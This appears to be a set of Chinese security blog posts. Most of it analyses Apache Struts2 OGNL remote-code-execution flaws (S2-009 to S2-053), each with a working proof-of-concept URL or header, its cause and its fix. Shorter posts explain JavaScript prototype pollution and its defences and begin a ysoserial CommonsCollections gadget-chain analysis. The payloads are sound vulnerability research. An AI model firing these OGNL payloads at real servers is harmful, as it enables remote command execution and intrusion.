OgnlContext context = new OgnlContext();Ognl.setValue("password",context,"@java.lang.Runtime@getRuntime().exec('open /Applications/Notes.app/')(glassy)");Ognl.setValue("a[(password)(glassy)]",context,"true");

第一行代码用于将password-payload的map写入ognl的root中去，第二行代码中的`a[(password)(glassy)]`在AST树中进行解析的时候按照从右到左，从里到外的顺序进行解析，因此优先解析`(password)(glassy)`,password的值在root中有（password-payload），于是解析成了payload(glassy)的形式，然后就是和ST2-003一样的原理造成了RCE了。

其实想造成RCE把`a[(password)(glassy)]`写成`(password)(glassy)`的形式就可以成功，但是由于我们构造payload的地方在参数名处，因此我们还需留意让payload保持着参数名的正常格式，否则是没法被st2作为参数名完整的传到OGNL中的。

简易POC

http://www.glassy.com/test.action?password=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Notes.app/Contents/MacOS/Notes%27%29%29%28meh%29&z[%28password%29%28meh%29]=true

原理

看一下调用链，其实一看是param方面的问题，直接去看ParametersInterceptor类就完事了，

漏洞成因其实就是把造成RCE的位置从参数名改到了参数值的位置，从而绕过了003和005补丁中对参数名的正则过滤，在OGNL中造成RCE的成因在上面已经分析完毕，不再重复。

修复

这次漏洞修复分为了两个部分，

1. 加强了对参数名正则的限制，使形如`a[(password)(glassy)]`的参数名被过滤掉了。

2. 在将param传给ognl的时候会去检查生成的AST树是否具有执行权限，如果有的话，就会抛出异常。

S2-012

适用版本：Struts Showcase 2.0.0 - Struts Showcase 2.3.14.2

简易POC

低版本struts，即还没引入allowStaticMethodAccess的poc

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash", "-c", "open /Applications/Notes.app/"})).start()}

这次的poc没有使用Runtime类而改用了ProcessBuilder类，这个类有一个优势，它不是静态类，命令执行的时候调用的start方法也不是静态方法，不受OgnlValueStack类的allowStaticMethodAccess值的限制。（注意一下，这个poc也要url编码和S2-001一样的原因）

在showcase app中的利用位置，

原理

造成这个RCE的问题出在了重定向上，当需要从ST2的值栈中读取数据作为重定向的参数，而这个值又是前端可控的情况下可以造成RCE。（也就是说其实不在showcase app中有类似场景也能造成RCE,只是这种情景比较少见。）

"save" class="org.apache.struts2.showcase.action.SkillAction" method="save">    <result type="redirect">edit.action?skillName=${currentSkill.name}result></action>

看一下调用栈，

因为这一次造成RCE是重定向的时候，这个时候各个Interceptor已经处理完传来的数据，RCE的调用也是从DefaultActionInvocation.executeResult往后走，

往后走后需要计算重定向的值，而重定向的值需要从stack中去取，

而stack处理取值的时候是使用递归的方式取值，首先取出currentSkill.name的值，发现值是ognl表达式，然后再去调ognl.getValue从而造成了RCE

修复

其实currentSkill.name在进入ognl.setValue的时候同样进入了之前修复001的时候的补丁代码，那么为什么这一次补丁代码没有生效呢。

原因就在于下图，之前的补丁修复方式就是把递归的pos放到了计算的结果后面，比如如果计算完了%{password}的值，下一次计算是从%{password}后面开始计算，然而这个补丁中有一个会重置pos为0的循环，

之前补丁能生效，是因为处理param的时候openChar只有1个字符，无法重置pos，

而使用重定向的功能的时候，传给evaluate的函数有两个openChar，从而导致循环的时候把本应该值是135（payload的长度）的pos重置为了0，从而重新把payload带入了ognl，造成了RCE。

使用这次修复代码十分简单，把pos=0放到了for循环外，防止对openChar做循环的时候把pos重置成0了。

S2-013

适用版本：2.0.0 - 2.3.14.1

013的利用场景比012还要苛刻，需要jsp的s:url或者s:a标签中的includeParams属性为all或者get，我这边给出我写的示例jsp

<%@ taglib prefix="s" uri="/struts-tags" %><%@ page contentType="text/html;charset=UTF-8" language="java" %>    ST2-013 Testtest

简易POC

http://www.glassy.com/Struts2Demo_war_exploded/hello.jsp?fakeParam=%25%7b%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%22%2fbin%2fbash%22%2c+%22-c%22%2c+%22open+%2fApplications%2fNotes.app%2f%22%7d)).start()%7d

原理

文字说明一下造成rce的流程：jsp通过s:url或s:a标签来动态生成跳转的action的时候，如果想把jsp里面的参数带到action的后面，就需要配置includeParams，这样的话服务端就会先去拿到jsp的参数，并带到ST2的ognl里面计算一下这个参数再去拼接到action后面，从而造成了rce。

调用栈如下，

buildParameterSubstring会把传入的参数的值放到translateVariables函数中，而translateVariables就把值交给了ognl的getValue从而造成了RCE。

修复

只对传过来的参数做一下urlencode，不在放到ognl里面去计算了。

S2-015

适用版本：2.0.0 - 2.3.14.2

这个poc也是对服务端配置有一点要求的，它要求当ST2使用通配符‘*’来做action映射的时候才能利用成功。

配置在struts.xml中，示例如下

    /example/{1}.jsp

ST2处理通配符配置的action映射的时候流程是这样的：如果一个请求的action在映射中不存在，那么就会去匹配通配符，ST2会根据请求的action名来加载对应的jsp文件。以上面的配置为例子，当请求一个struts.xml中不存在的test.action的时候，ST2就会去吧/example/test.jsp的内容返回给前端。

实用POC

http://www.glassy.com/Struts2Demo_war_exploded/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ifconfig%27%29.getInputStream%28%29%29%2C%23q%7D.action

这一次的poc给出了实用版本的poc，主要原因在于之前的简易poc都是以打开计算器为实例，而这一次由于造成rce的位置在路径位置，导致带有 ‘/’ 的命令无法进入到ST2的ognl，所以只能使用ifconfig这种简单的命令，想验证执行就需要有回显（这里指的是mac下的复现情况）。

原理

先看调用栈，

这个漏洞的触发流程和012的流程差不多，012是在各个Interceptor处理完毕，开始计算重定向位置的时候造成的RCE,015是在各个Interceptor处理完毕，计算定向的jsp的时候造成的RCE,RCE的调用也是从DefaultActionInvocation.executeResult往后走,

具体的数据流也是和012相差无几的，这里就不再详细分析。

修复

修复就是对actionname做了正则限制。

S2-016

适用版本：2.0.0 - 2.3.15

ST2使用action:或redirect:\redirectAction:作为前缀参数来进行短路导航状态变化，后面用来跟一个期望的导航目标表达式。一看到这两个写法后面跟的是表达式，一定意义上就看到了RCE的可能性。

简易POC

http://www.glassy.com/Struts2Demo_war_exploded/hello.action?redirect:%24%7b%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%27%2fbin%2fbash%27%2c+%27-c%27%2c%27open+%2fApplications%2fNotes.app%2f%27%7d)).start()%7d

原理

先看调用栈，

调用栈和原理也和012几乎一样不再详细分析。

唯一需要注意的就是ST2对类似于redirect:这样的写法的处理是统一放在DefaultActionMapper里的，感兴趣的可以自己去看一下源码，

修复

修复方式十分简单粗暴，把这种用法给删除，只留下了action:和method:两种无害的写法。（因为通过actionname造成的RCE已经在015漏洞处修复，所以action:这种写法就算是无害的了。）

S2-019

适用版本：2.0.0 - 2.3.15.1

019漏洞要求ST2开启开发者模式才能利用成功，不过ST2默认情况下开发者模式是打开的，如果想关闭，需要在struts.xml中添加如下配置，

简易POC

随便找个action，param的话post和get都行，

http://www.glassy.com/Struts2Demo_war_exploded/hello.action?debug=command&expression=%23a%3d(new+java.lang.ProcessBuilder(%27open+%2fApplications%2fNotes.app%2f%27)).start()

原理

看这个漏洞要求开发者模式，且poc第一个参数是debug，就知道触发点应该是在DebuggingInterceptor上，去看一下intercept函数，整个利用一目了然，

 public String intercept(ActionInvocation inv) throws Exception {        boolean actionOnly = false;        boolean cont = true;        Boolean devModeOverride = FilterDispatcher.getDevModeOverride();        boolean devMode = devModeOverride != null ? devModeOverride : this.devMode;        final ActionContext ctx;        if (devMode) {            ctx = ActionContext.getContext();            String type = this.getParameter("debug");            ctx.getParameters().remove("debug");            if ("xml".equals(type)) {                inv.addPreResultListener(new PreResultListener() {                    public void beforeResult(ActionInvocation inv, String result) {                        DebuggingInterceptor.this.printContext();                    }               ...               ...            } else if ("command".equals(type)) {                ValueStack stack = (ValueStack)ctx.getSession().get("org.apache.struts2.interceptor.debugging.VALUE_STACK");                if (stack == null) {                    stack = (ValueStack)ctx.get("com.opensymphony.xwork2.util.ValueStack.ValueStack");                    ctx.getSession().put("org.apache.struts2.interceptor.debugging.VALUE_STACK", stack);                }
                String cmd = this.getParameter("expression");                ServletActionContext.getRequest().setAttribute("decorator", "none");                HttpServletResponse res = ServletActionContext.getResponse();                res.setContentType("text/plain");
                try {                    PrintWriter writer = ServletActionContext.getResponse().getWriter();                    writer.print(stack.findValue(cmd));                    writer.close();                } catch (IOException var17) {                    var17.printStackTrace();                }

从debug参数获取调试模式，如果模式是command，则把expression参数放到stack.findValue中，最终放到了ognl.getValue中。

修复

这个漏洞说是利用只到2.3.15，但是我在2.3.16依旧可以利用成功，我猜官方的意思应该就是debug下允许这种操作，所以提倡使用者关闭开发者模式吧。

S2-029

适用版本：2.0.0 - 2.3.24.1 (不包括2.3.20.3)

029的利用场景比较苛刻，所以在官方的漏洞定级上，比以往的RCE漏洞定级要低。

这次的RCE是一个二次的ongl表达式执行，它不再是像之前大多漏洞，随便找一个action就可以执行，它需要一个映射的jsp中将形如${name}的字符放到ST2的标签的属性中的action，然后通过将name参数构造出特殊的ognl表达式才能造成RCE。

下面给出示例写法，

实用poc

这次的实用POC非常好写，不需要重写response类，因为ST2会把插入的OGNL表达式的结果当做标签的value返回给前端。

http://www.glassy.com/Struts2Demo_war_exploded/s2029.action?message=(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties'],%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('open%20/Applications/Notes.app/').getInputStream()))

原理

看一下调用栈，

其实这个漏洞和001有着很大的相似性，001就是在返回jsp的时候需要把输入的值放到jsp标签的value中，所以先把这个参数名放到了ognl.getvalue中，而当它的值又是ognl表达式的时候，就会递归的放进getvalue中导致了RCE。因为后续的补丁已经从根本上隔绝了绕过的可能性，所以这次的漏洞就是保证了payload在进入补丁代码前就已经是ognl表达式的格式（即%{*}）。

当前端标签的属性值存在本来就是%{*}的格式的情况，只需要传入ognl表达式，就可以保证payload在传到UIBean的evaluateParams函数的时候，name就已经是一个ST2的ognl表达式格式了，这样在后续的处理中就会顺理成章的交给ognl.getvalue，从而导致了RCE。

问题的关键在于completeExpressionIfAltSyntax函数给我们传进的表达式放到了%{}之中，

    protected String completeExpressionIfAltSyntax(String expr) {        return this.altSyntax() ? "%{" + expr + "}" : expr;    }

修复

这一次的修复放在了OgnlUtil处，选择了治标治本的方法，直接对AST树的执行权限做了限制。（之前第一次对AST树执行权限的限制仅仅是对ATSChain类的执行做了限制，而此次构造的payload生成的是ATSSequence类，所以这次也对这个类的执行做了限制）

S2-032

适用版本：2.3.20 - 2.3.28（2.3.20.3和2.3.24.3除外）

这个版本漏洞要求在struts.xml中将DynamicMethodInvocation设置为true才能利用成功。（低版本ST2的DynamicMethodInvocation默认为true，高版本默认为false）

简易poc

http://www.glassy.com/struts2-showcase/home11.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D),d&cmd=/Applications/Notes.app/Contents/MacOS/Notes

这一次的poc有几个非常奇妙的地方，需要一一留意。

1、为什么这一次没有直接写成@java.lang.Runtime@getRuntime().exec('whoami')的形式，而写成了@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D)的形式。

有心的同志们可要去尝试一下第一种写法，会发现会报OGNL表达式错误，根本原因就在于使用method:的时候ST2会去创建一个ActionProxy来执行method后面的内容，当我们把内容放到StrutsActionProxy类的构造函数中去创建代理对象的时候会对我们传进来的表达式做一次编码，导致最后进入ognl.getValue中的表达式变成了@java.lang.Runtime@getRuntime().exec(\'whoami\')，从而导致了ognl表达式的报错。而request中所有的参数都会放在context中，可以通过#parameters.参数名[0]的方式获取，非常方便。

2、为什么poc末尾会有一段非常奇怪的:',d'。这个问题要去看一下DefaultActionInvocation类，

可以看到在传给ognl.getValue之前，代码会给我们传过来的表达式后面加一个括号，而我们的poc写成 ,d的形式只是为了去构成一个形如d()的函数形式，防止ognl表达式报错。

原理

在S2-016中，我们已经介绍过，ST2处理url中处理method:这类写法的代码在DefaultActionMapper中，我们去看一下。

看到的那个if语句，也就是我们需要保证DynamicMethodInvocation为true的原因。

看一下造成rce的调用栈，

这一次调用栈也非常简单，关键的poc构造部分在上面已经解析完了，我这里依旧文字说明一下流程：当所有的interceptors调用完成后，计算返回码的时候，ST2就开始去计算我们最初传过来的method：后面的值，从而把内容放进了ognl.getValue，造成了RCE。

修复

这一次的修复是把传过来的methmod的值放到了cleanupActionName函数中做了一下正则过滤。

this.allowedActionNames = Pattern.compile("[a-zA-Z0-9._!/\\-]*");

看到这里有人会产生疑问，分明S2-029的修复补丁中把AST树的执行权限都禁了，怎么还能执行成功，我专门去看了一下2.3.28的代码，万万没想到，2.3.24.3的补丁代码没了，这也是为什么2.3.28可以利用而2.3.24.3除外的原因。

注：S2-033和S2-037与032的利用原理、修复补丁基本相似，所以不再分析。

S2-045

适用版本：2.3.5 - 2.3.31, 2.5 - 2.5.10

这次的漏洞，官方通告中说的是上传组件的问题导致的RCE漏洞，但是利用的话，随便任意一处.action都可以利用成功。

简易poc

Content-Type:%{(#glassy='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#a=(new java.lang.ProcessBuilder('/Applications/Notes.app/Contents/MacOS/Notes')).start())}

关于poc有一处细节非常重要，我们可以看到连接每个表达式的不再是',' 而变成了'.' ，有心的同学可以去试一下使用','是不行的，问题就出在了S2-029的补丁把ATSSequence树给禁了，而用','连接生成的AST树都是ATSSequence树，使用之所以使用'.'也就是为了绕过S2-029的补丁。

原理

这一个漏洞的调用链还是和之前的有很大的不同的，

我们这次从Dispatcher类开始分析，这也是ST2刚收到request时候的处理类，当ST2收到的request包包含Content-Type，并且Content-Type中包含“multipart/form-data”的时候会把请求交给MultiPartRequestWrapper处理，

MultiPartRequestWrapper会使用JakartaMultiPartRequest类去处理上传，文件，当上传文件出错的时候，就会调用buildErrorMessage函数处理报错，

接下来，经过几个函数后，报错的信息被传入了TextParseUtil.translateVariables，translateVariables会在后续的调用中将报错信息中用%{}包裹的内容带入ognl.getValue（这些都是前面提到过的了），而这个报错信息，就包含的有我们Content-Type头中的所有内容，从而导致传入ognl中的值攻击者可控，造成了RCE漏洞。

修复

这个漏洞修复比较简单，就是不把报错的信息放到LocalizedTextUtil.findText函数中去了，从而保证报错的content-type不被带进ognl。

S2-046的漏洞原理和修复与045一样，区别在于触发报错的方式和ognl表达式的注入点不一样，不再详细分析。

S2-048

适用版本：使用了Struts 1 plugin 和Struts 1 action 的2.3.x 版本

048的利用场景也是比较苛刻的，简单的说是当传入ActionMessage的值是用户可控的情况下，攻击者可以通过传入恶意的payload造成RCE。

示例代码就贴一下官方showcase Demo中可以利用成功的SaveGangsterAction

public class SaveGangsterAction extends Action {    public ActionForward execute(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response) throws Exception {        GangsterForm gform = (GangsterForm) form;        ActionMessages messages = new ActionMessages();        // gform参数的name字段用户可控切被传入了ActionMessage类，满足了攻击条件。        messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " added successfully"));        addMessages(request, messages);        return mapping.findForward("success");    }}

简易POC

这里的poc也是以showcase app中的saveGangster.action作为示例的。

name=${(#glassy='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#a=(new java.lang.ProcessBuilder('/Applications/Notes.app/Contents/MacOS/Notes')).start())}&age=11&__checkbox_bustedBefore=true&description=22‍

原理

虽然举的例子是SaveGangsterAction，但是漏洞的真正触发点是在Struts1Action，当在ST2中需要去使用ST1的类的时候就需要去调用这个Struts1Action类，像刚刚举例的SaveGangsterAction类中，Action、ActionMapping、ActionMessage、ActionMessages类都是ST1中的。

我们先去整体看一下调用链，可以注意到虽然访问的是SaveGangsterAction类，但调用链中还交给Struts1Action去处理的，

这个调用链跟的比较长，但其实可以跟的很短，这就需要一个良好的ST2漏洞发掘经验，我们可以明确一个思路：

只要看到可控的参数被传到了TextParseUtil.translateVariables或ActionSupport.getText方法了，就说明这个参数最终会被交给OGNL.getValue。

直接去跟进Struts1Action.execute，

其中

ActionForward forward = action.execute(mapping, this.actionForm, request, response);

就是去执行SaveGangsterAction的execute方法，然后就去获取传给ActionMessage的值

        ActionMessages messages = (ActionMessages)request.getAttribute("org.apache.struts.action.ACTION_MESSAGE");

最后传给了ActionSupport.getText从而成功在后续的调用中把payload交到了OGNL.getValue中，造成RCE。

this.addActionMessage(this.getText(msg.getKey()));

修复

这次的修复ST2不是在自己代码中去做的，而是给出了当在ST2中使用struts2-struts1-plugin的规范，以SaveGangsterAction为例

要写成

messages.add("msg", new ActionMessage("struts1.gangsterAdded", gform.getName()));

而不能写成

messages.add("msg", new ActionMessage("Gangster " + gform.getName() + " was added"));

简单的说就是不要把前端可控参数传到ActionMessage的key中，如果真需要把前端可控参数传给ActionMessage，就传到value中。

S2-053

适用版本：2.0.0 - 2.3.33 , 2.5 - 2.5.10.1

053版本的利用条件也比较苛刻，只有服务端将用户可控的参数放到了Freemarker的标签属性中的时候，才会造成RCE，实例写法如下，

<@s.url value="${name}"/>

当name参数是客户端传过来的时候，就会在ST2服务器上造成RCE

简易POC

http://www.glassy.com/Struts2Demo_war_exploded/s2053.action?name=%25%7b(%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23a%3d(new+java.lang.ProcessBuilder(%27%2fApplications%2fNotes.app%2fContents%2fMacOS%2fNotes%27)).start())%7d

原理

看一下调用链，

因为漏洞触发是发生在ST2返回页面的时候，所以调用链就从StrutsResultSupport.execute开始跟，st2看到返回的页面是Freemarker模板的，所以交给FreemarkerResult类处理，Freemarker在处理的时候需要去找name的值以便生成完整的标签，于是通过ST2去findString，发现name参数是ognl表达式，于是交给了ognl.getValue，造成了rce。

修复

这次的修复是在FreemarkerManager中多了两行代码，

 LOG.debug("Sets NewBuiltinClassResolver to TemplateClassResolver.SAFER_RESOLVER", new String[0]);configuration.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);

去看了一下TemplateClassResolver.SAFER_RESOLVER)的官方文档，

TemplateClassResolver.SAFER_RESOLVER now disallows creating freemarker.template.utility.JythonRuntime and freemarker.template.utility.Execute. This change affects the behavior of the new built-in if FreeMarker was configured to use SAFER_RESOLVER, which is not the default until 2.4 and is hence improbable.

大致意思应该就是禁止了freemarker的RCE，具体我对freemarker不太了解，就不去误人子弟了。

总结

这里的总结就通过一个表格去表现了。

阅读原文

跳转微信打开

Javascript原型链攻击与防御

Mon, 14 Oct 2019 17:30:00 +0800

xsser 2019-10-14 17:30

在讲这个漏洞之前我们来理解一下Javascript。与其他的语言不同的是，Js在Es6之前是没有class的，他更多的是一个原型语言，在Js里有一句话很有名——"一切皆对象"

“ NaN!=NaN”

—

什么是原型语言

只有对象,没有类;对象继承对象,而不是类继承类。
“原型对象”是核心概念。原型对象是新对象的模板，它将自身的属性共享给新对象。一个对象不但可以享有自己创建时和运行时定义的属性，而且可以享有原型对象的属性。
每一个对象都有自己的原型对象，所有对象构成一个树状的层级系统。root节点的顶层对象是一个语言原生的对象，只有它没有原型对象，其他所有对象都直接或间接继承它的属性。

—

关于Function.prototype和Object.__proto__

对象有__proto__属性，函数有prototype属性；
对象由函数生成；
生成对象时，对象的__proto__属性指向函数的prototype属性。

在没有手动修改__proto__属性的指向时，以上三条便是JavaScript默认原型链指向逻辑。如果要更形象的去理解这个就可以看下下图的这个结构

—

什么是JavaScript原型链污染

原型链污染来自一个CVE(https://github.com/jquery/jquery/pull/4333)，这个CVE是一个在jquery中修复的漏洞，但是这个漏洞广义的推广的话，受影响的范围应该是一切使用了ecmascript的应用，无论前后端。关于这个漏洞，是修复了jQuery的$.extend(true…)方法，在jQuery中，这个方法用于将一个或多个对象的内容合并到目标对象。所以你永远不知道有不有人会不会写出一些类似以下的代码

for( var i = 0 ;i < datas.length; i++ ) {
$.extend( true, allNode, datas[i] )
}

当我们可控$.extend的参数的时候，我们就可以覆盖对象的__proto__或者prototype方法从而控制整个原型链的最顶端的方法，重写该方法将覆盖子对象或者函数的方法，从而导致污染原本的方法意图。

在npmjs官方搜下对象操作的库可以看到一大堆，例如“xtend”、 “deepmerge”、 “webpack-merge”、 “merge2”、 “lodash.merge”。假如一些应用使用了这些方法，但是对参数没做任何处理。

—

漏洞范围影响

提出这个Javascript原型链污染攻击的作者写了一个pdf，在该pdf中，作者不仅做了漏洞的成因分析，还针对此漏洞做了受害范围分析，他在github上搜索了部分的组件，这些组件都是可以操作对象，一般都是对象合并操作的，较为底层，因此也会有大量的应用基于这些组件。例如“hoek”，“lodash”，“defaults-deep”等修复了这个原型链污染的可能性，当然还有一些组件他没统计到，例如“xtend”之类的，光weekly download的数量就有“12,097,425”。

笔者在npm上搜索了基于xtend的一些应用，找到一个language-exec这样的一个组件。这个组件是一个基于xtend的，不过这个组件好像年久失修而且没啥人用，看了源代码其中就有这样的一句话

return exec(cmd, extend({

cwd: path.dirname(file)

}, opts), done);

可以看到类似的写法都是存在问题的(主要是我没找到具体的基于xtend的受影响应用)。

所以基于这个，大家不是有了刷CVE的思路了？没错…只要你敢花时间去爬全部的dependence就可以有机会获得javascript pollutionattack CVE。

—

案例一远程命令执行

作者在github上搜到了一款叫做ghost cms的应用，当然这个漏洞已经修复，当黑客发送以下请求即可实现控制任意方法或者对象的任意属性。当然也就是rce了

—

案例二 DOS

在一切皆对象的JavaScript中，所有对象都可以调用toString和valueOf方法，当你通过__proto__重写这2个方法的时候，就容易在express等web框架中产生dos，导致服务无法正常运行。类似以下的写法就容易产生拒绝服务

—

案例三任意文件读取

如果你可以通过污染原型链来重写一些“私有属性”的话(Javascript没有私有属性)，可能可以重写那些在WEB中用来定义渲染模板文件的属性值，就有可能产生任意文件读取了，如以下这个图片

—

如何防御

在这里我们了解下这类攻击，如何从代码上更安全的编写，更好的防御这类漏洞。漏洞发现的作者给出了2个解决方案，先来看看我是如何防御的。

如果是我来解决这个问题的话，我会选择迭代对象的属性，直到查找到__proto__和prototype这2个属性名，如果出现就干掉。但是这个方法还是有缺陷，一个是建立于黑名单，需要列入的属性太多了，例如Dos的话就要把tostring和valueof等方法列入，而且遇到私有属性覆盖的话，怎么确保参数，接口很多。

原作者提出了3点：

1、使用Object.freeze来冻结对象，几乎所有的 JavaScript对象都是 Object的实例。所以冻结Object.prototype即可。具体大家可以去了解下es5就新增的Object.freeze方法，使用了这个方法，那么黑客就无法对prototype新增或者重写对应原型链上的方法，不过这样可能会导致一些隐性的bug产生，而且可能还不知道是哪里出错了。

2、用map数据结构来代替自带的对象结构。Es6就有map结构啦，这个map和Object的区别就是map的键可以是任意的对象类型，数组也好，对象也好。

3、使用Object.create(null)（强烈推荐），使用这个方法就可以更好的防御原型链污染攻击了，因为Object.create(null)使得创建的新对象没有任何的原型链，是null的，不具备任何的继承关系，当你接受一个客户端的参数并且打算merge的话，可以使用此方法后去merge，这样的对象是比较安全的，客户端没办法通过原型链来污染攻击(因为压根就没原型链通往其他的对象)。我们可以简单的通过一个实验来看下。

阅读原文

跳转微信打开

玩转ysoserial-CommonsCollection的七种利用方式分析

Tue, 17 Sep 2019 15:24:00 +0800

Glassy 2019-09-17 15:24

CommonsCollection在java反序列化的源流中已经存在了4年多了，关于其中的分析也是层出不穷，本文旨在整合分析一下ysoserial中CommonsCollection反序列化漏洞的多种利用手段，从中探讨一下漏洞的思路。

Author：Glassy@平安银行应用安全团队

引言

CommonsCollection在java反序列化的源流中已经存在了4年多了，关于其中的分析也是层出不穷，本文旨在整合分析一下ysoserial中CommonsCollection反序列化漏洞的多种利用手段，从中探讨一下漏洞的思路，并且对于ysoserial的代码做一下普及，提升大家对于ysoserial的代码阅读能力。

ysoserial的关键编码技术介绍

首先我们先去了解一下ysoserial的源码中的一些常用技术做一个简单的科普。

动态代理

动态代理比较常见的用处就是：在不修改类的源码的情况下,通过代理的方式为类的方法提供更多的功能。

举个例子来说（这个例子在开发中很常见）：我的开发们实现了业务部分的所有代码，忽然我期望在这些业务代码中多添加日志记录功能的时候，一个一个类去添加代码就会非常麻烦，这个时候我们就能通过动态代理的方式对期待添加日志的类进行代理。

看一个简单的demo：

Work接口需要实现work函数

public interface Work { public String work();}

Teacher类实现了Work接口

public class Teacher implements      Work{ @Override     public String work() {          System.out.println("my work is teach students"); return          "Teacher";} }

WorkHandler用来处理被代理对象，它必须继承InvocationHandler接口，并实现invoke方法

import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; public class WorkHandler implements InvocationHandler{      //代理类中的真实对象     private Object obj;     //构造函数，给我们的真实对象赋值 public     WorkHandler(Object obj) {        this.obj = obj;}     @Override    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {         //在真实的对象执行之前我们可以添加自己的操作         System.out.println("before invoke...");        //java的反射功能，用来调用obj对象的method方法，传入参数为        args Object invoke = method.invoke(obj, args);       //在真实的对象执行之后我们可以添加自己的操作        System.out.println("after invoke...");        return invoke;}
}

在Test类中通过Proxy.newProxyInstance进行动态代理，这样当我们调用代理对象proxy对象的work方法的时候，实际上调用的是WorkHandler的invoke方法。

import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; public class Test {      public static void main(String[] args) {          //要代理的真实对象         Work people = new Teacher();}//代理对象的调用处理程序，我们将要代理的真实对象传入代理对象的调用处理的构造函数中，最终代理对象的调用处理程序会调用真实对象的方法
InvocationHandler handler = new WorkHandler(people);
/**
* 通过Proxy类的newProxyInstance方法创建代理对象，我们来看下方法中的参数
* 第一个参数：people.getClass().getClassLoader()，使用handler对象的
classloader对象来加载我们的代理对象
* 第二个参数：people.getClass().getInterfaces()，这里为代理类提供的接口  是真实对象实现的接口，这样代理对象就能像真实对象一样调用接口中的所有方法
* 第三个参数：handler，我们将代理对象关联到上面的InvocationHandler对象上
*/
Work proxy= (Work)Proxy.newProxyInstance(handler.getClass().getClassLoader(),people.getClass().getInterfaces(), handler); System.out.println(proxy.work());}

看一下输出结果，我们再没有改变Teacher类的前提下通过代理Work接口，实现了work函数调用的重写。

before invoke...my work is teach students after invoke...Teacher

javassist动态编程

ysoserial中基本上所有的恶意object都是通过动态编程的方式生成的，通过这种方式我们可以直接对已经存在的java文件字节码进行操作，也可以在内存中动态生成Java代码，动态编译执行，关于这样做的好处，作者在工具中也有提到：

could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections

关于javassist动态编程，我就只把关键的函数及其功能罗列一下了

//获取默认类池，只有在这个ClassPool里面已经加载的类，才能使用ClassPool pool = ClassPool.getDefault();//获取pool中的某个类CtClass cc = pool.get("test.Teacher");//为cc类设置父类cc.setSuperclass(pool.get("test.People"));//将动态生成类的class文件存储到path路径下cc.writeFile(path);//获取类的字节码byte[] b=cc.toBytecode();//创造Point类CtClass cc = pool.makeClass("Point");//为cc类添加成员变量cc.addField(f);//为cc类添加方法cc.addMethod(m);//为cc类设置类名cc.setName("Pair");

CommonsCollections反序列化漏洞的利用

关于CommonsCollections利用的最基础的原理，已经在很久以前都被各位大佬，分析的烂熟了，所以这里我就只点到为止了，如果有不熟悉的可以去看一下@BadCode写的分析，非常的详细。

这边先看一下基础模块：

public void CommonsCollectionsTest() { String[]           execArgs = new String[]{"open/Applications/Calculator.app/"};          // inert chain for setupTransformer transformerChain = new ChainedTransformer( new           Transformer[]{new ConstantTransformer(1)});        // real chain for after setup        Transformer[] transformers = new Transformer[]{ new                  ConstantTransformer(Runtime.class),   new InvokerTransformer("getMethod", new             Class[]{ String.class, Class[].class}, new             Object[]{ "getRuntime", new Class[0]}),   new InvokerTransformer("invoke", new Class[]{ Object.class,             Object[].class}, new Object[]{ null, new Object[0]}),   new InvokerTransformer("exec",            new Class[]{String.class}, execArgs), new    ConstantTransformer(1)}; setFieldValue(transformerChain, "iTransformers", transformers);//transform 函数要求传入一个Object对象，但是不论传入什么都不会影响我们的命令执行，所以我这边就随便传入一个字符串transformerChain.transform("aaa");}

CommonsCollections造成RCE的根本原因就在于我们构造了一个特殊的ChainedTransformer类的对象，这样当我们调用这个对象的transform函数的时候，就会造成命令执行，于是,我们需要做的事情就是去寻找某个类,把包含恶意代码的transformerChain放到这个类里面，当对这个类的对象进行反序列化的时候会调用

transformerChain的transform函数。

上代码前先把pom.xml的依赖给出来

<dependencies>                       <dependency>           <groupId>org.apache.commonsgroupId>           <artifactId>commons-collections4artifactId>           <version>4.0version>       dependency>            <dependency>           <groupId>commons-collectionsgroupId>
<artifactId>commons-collectionsartifactId><version>3.2.1version>dependency>
<dependency><groupId>com.nqzerogroupId><artifactId>permit-reflectartifactId><version>0.3version>dependency><dependency><groupId>junitgroupId><artifactId>junitartifactId><version>4.12version><scope>testscope>dependency>